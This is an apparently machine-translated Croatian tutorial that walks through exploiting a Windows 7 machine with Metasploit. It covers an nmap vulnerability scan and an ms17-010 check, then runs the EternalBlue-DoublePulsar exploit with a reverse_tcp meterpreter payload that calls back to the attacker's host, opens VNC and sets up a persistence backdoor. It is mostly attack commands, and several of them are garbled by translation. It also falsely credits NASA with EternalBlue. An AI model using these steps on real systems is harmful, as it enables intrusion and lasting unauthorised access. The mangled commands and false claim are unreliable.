metasploit

Vodič za metasploit

Vodič za metasploit

Kako smo razgovarali o TOP 25 NAJBOLJIH ALATA KALI LINUX, a METASPLOIT smo stavili na prvo mjesto popisa, sada razgovarajmo i naučimo o METASPLOIT-u. Preporučili bismo vam da se upoznate s Metasploitom.

Metasploit u početku stvorio H. D Moore 2003., dok ga Rapid7 nije stekao i dalje razvijao 21. listopada 2009. Metasploit-framework je u potpunosti napisan koristeći Ruby i standardni je paket instaliran u sustavu Kali Linux (a također i gotovo svi OS za testiranje prodiranja, pretpostavljam). Omiljeni je set hakera ili testera penetracije za istraživanje sigurnosnih ranjivosti, razvoj i izvršavanje exploita na ciljevima i drugi sigurnosni razvoj.

Metasploit dolazi s nekoliko izdanja, uglavnom podijeljenih u dvije kategorije, besplatnu verziju i verziju koja se plaća. Besplatne verzije: Metasploit Framework Community Edition (sučelje temeljeno na CLI) i Armitage (sučelje temeljeno na GUI). Plaćene verzije: Metasploit Express, Metasploit Pro i Cobalt Strike (slično je s Armitage-om, koji pruža Strategic Cyber ​​LLC).

Metasploit omogućuje korisnicima stvaranje (ili razvoj) vlastitog exploit koda, ali ne brinite ako ne znate kodirati, Metasploit ima toliko modula i oni se kontinuirano ažuriraju. Trenutno Metasploit ima preko 1600 iskorištavanja i 500 korisnih tereta. Jednostavan način da se razumije što su exploiti i korisni tereti, exploit je u osnovi način na koji napadač isporučuje korisni teret kroz rupu ranjivosti ciljnog sustava.  Jednom kada napadač pokrene exploit koji sadrži korisni teret prema ranjivom cilju, a zatim raspoređeni nosivi teret (korisni teret koji se koristi za ponovno povezivanje s napadačem radi dobivanja udaljenog pristupa protiv ciljnog sustava), u ovoj je fazi exploit gotov i postaje nebitan.

"Metasploit nije hakirajući instant alat, to je suludi okvir"

Ovaj članak o Metasploitu govori o provođenju ispitivanja penetracije prema ciljanom sustavu koristeći sljedeći tok:


PRIPREMA

Provjerite ima li naš Kali Linux najnoviju ažuriranu verziju. U svakom će ažuriranju biti poboljšanja. Izvedite sljedeće naredbe:

~ # apt ažuriranje
~ # apt nadogradnja -y
~ # apt dist-nadogradnja -y

Nakon što je naš stroj ažuriran, sada započnimo paljenjem metasploit konzole. U terminal unesite:

~ # msfconsole

Također vam je potreban bilo koji uređivač teksta, Gedit ili Leafpad, koji će usput prikupiti neke podatke prije nego što kompajliramo napad. Prvo identificirajte svoju IP adresu bežičnog sučelja, IP usmjerivača i mrežnu masku.

Na temelju gornjih podataka bilježimo WLAN1 i IP adresu usmjerivača te mrežnu masku. Dakle, bilješka bi trebala izgledati ovako:

IP napadača (LHOST): 192.168.1.56
IP pristupnika / usmjerivača: 192.168.1.1
Mrežna maska: 255.255.255.0 (/ 24)


KORAK 1: SKENIRANJE RANJIVOSTI

U konzoli metasploit prvo prikupljamo informacije, poput ciljne IP adrese, operativnog sustava, otvorenih portova i ranjivosti. Metasploit nam omogućuje pokretanje NMapa izravno s konzole. Na temelju gornjih podataka pokrenite ovu naredbu da biste izvršili naš zadatak prikupljanja podataka.

msf> nmap -v 192.168.1.1/24 --skripta vuln -Pn -O

Iz naredbe gore dobili smo donji rezultat.

Dobili smo ranjivu metu s operativnim sustavom Windows, a ranjivi je na usluzi SMBv1. Dakle, dodajte napomenu.

Ciljana IP (RHOST): 192.168.1.57
Ranjivost: Ranjivost izvršenja udaljenog koda na Microsoft SMBv1 poslužiteljima (ms17-010)


KORAK 2: PROCJENA RANJIVOSTI

Sada znamo cilj i njegovu ranjivost. Provjerimo ranjivost u metasploit konzoli

Sada znamo cilj i njegovu ranjivost. Provjerimo ranjivost u metasploit konzoli pomoću pomoćnog modula smb_scanner. Pokrenite sljedeću naredbu:

msf> koristi pomoćni / skener / smb / smb_ms17_010
msf pomoćni (smb_ms17_010)> postavi RHOSTS [ciljni IP]
msf pomoćni (smb_ms17_010)> pokreni

Metasploit je siguran u ranjivost i pokazuje točno izdanje Windows OS-a. Dodaj na bilješku:

Ciljani OS: Windows 7 Ultimate 7600


KORAK 3: EKSPLOATACIJA

Na nesreću, metasploit nema eksploatacijski modul povezan s ovom ranjivošću. Ali, ne brinite, vani je čovjek koji je izložen i napisao eksploatacijski kôd. Ekploit je poznat, jer ga je pokrenula NASA, zove se EternalBlue-DoublePulsar. Možete ga preuzeti odavde, ili možete slijediti vodič iz video snimka u nastavku kako biste instalirali exploit kôd u svoj okvir metasploit-a.

Nakon što slijedite gornji vodič, (provjerite je li put isti kao vodič). Sada ste spremni iskoristiti metu. Izvedite sljedeće naredbe:

upotrijebite exploit / windows / smb / foreverblue_doublepulsar
postaviti nosivost windows / meterpreter / reverse_tcp
postaviti PROCESSINJECT spoolsv.exe
postavite RHOST 192.168.1.57
postavite LHOST 192.168.1.56

Iskorištavati

Bum ... Eksploatacija je uspjela, imamo sesiju mjerača vremena. Kao što sam ranije spomenuo, nakon pokretanja exploit-a rasporedit će korisni teret, a to je, ovdje smo koristili, windows /brojač metara/ reverse_tcp.


KORAK 4: DOBIJANJE DALJINSKOG PRISTUPA

Istražimo dostupnije naredbe, unesite '?'(bez upitnika) i pogledajte popis dostupnih naredbi. The Stdapi, naredbe sustava su:

Da biste vidjeli više informacija o ciljnom sustavu, upotrijebite 'sysinfo'naredba. Izlaz bi trebao izgledati ovako.

Budući da sustav ubrizgavamo ranije (spoolsv.exe), dobili smo System Privilege. Posjedujemo metu. Naredbom do cilja možemo puno učiniti. Na primjer, mogli bismo pokrenuti RDP ili jednostavno postaviti VNC daljinski. Da biste pokrenuli VNC uslugu, unesite naredbu:

~ # pokreni vnc

Rezultat bi trebao biti ciljana radna površina računala, izgleda ovako.

Najvažniji dio je stvoriti backdoor, pa kad god se cilj odvoji od našeg stroja, ciljni stroj pokušat će se spojiti natrag, opet na nas. Backdooring se koristi za održavanje pristupa, to je poput ribolova, nećete baciti ribu natrag u vodu kad je uhvatite? Želite nešto učiniti s ribom, bilo da je spremite u hladnjak za daljnje radnje, poput kuhanja, ili je prodate za novac.

Meterpreter ima ovu trajnu funkciju backdoor-a. Pokrenite sljedeću naredbu i pogledajte dostupne parametre i argumente.

meterpreter> pokrenuti ustrajnost -h

Ako vam nije ugodno s ovom zastarjelom skriptom, nalazi se najnoviji modul postojanosti post / windows / manage / persistence_exe. Možete to dalje istražiti sami.

Metasploit je ogroman, nije samo alat, već je okvir, uzmite u obzir da ima preko 1600 iskorištavanja i oko 500 korisnih tereta. Jedan je članak prikladan za širu sliku opće upotrebe ili ideje. Ali, toliko ste naučili iz ovog članka.

„Što više pratite tok napada, to više imate izazova bez napora."

Najpopularnije laboratorijske igre Oculus App
Ako ste vlasnik slušalica Oculus, tada morate biti sigurni u bočno učitavanje. Bočno učitavanje postupak je instaliranja nehranjenog sadržaja na vaše ...
10 najboljih igara za igranje na Ubuntuu
Windows platforma bila je jedna od dominantnih platformi za igre zbog ogromnog postotka igara koje se danas razvijaju kako bi podržavale Windows. Može...
5 najboljih arkadnih igara za Linux
U današnje vrijeme računala su ozbiljni strojevi koji se koriste za igre na sreću. Ako ne uspijete dobiti novi visoki rezultat, znat ćete na što misli...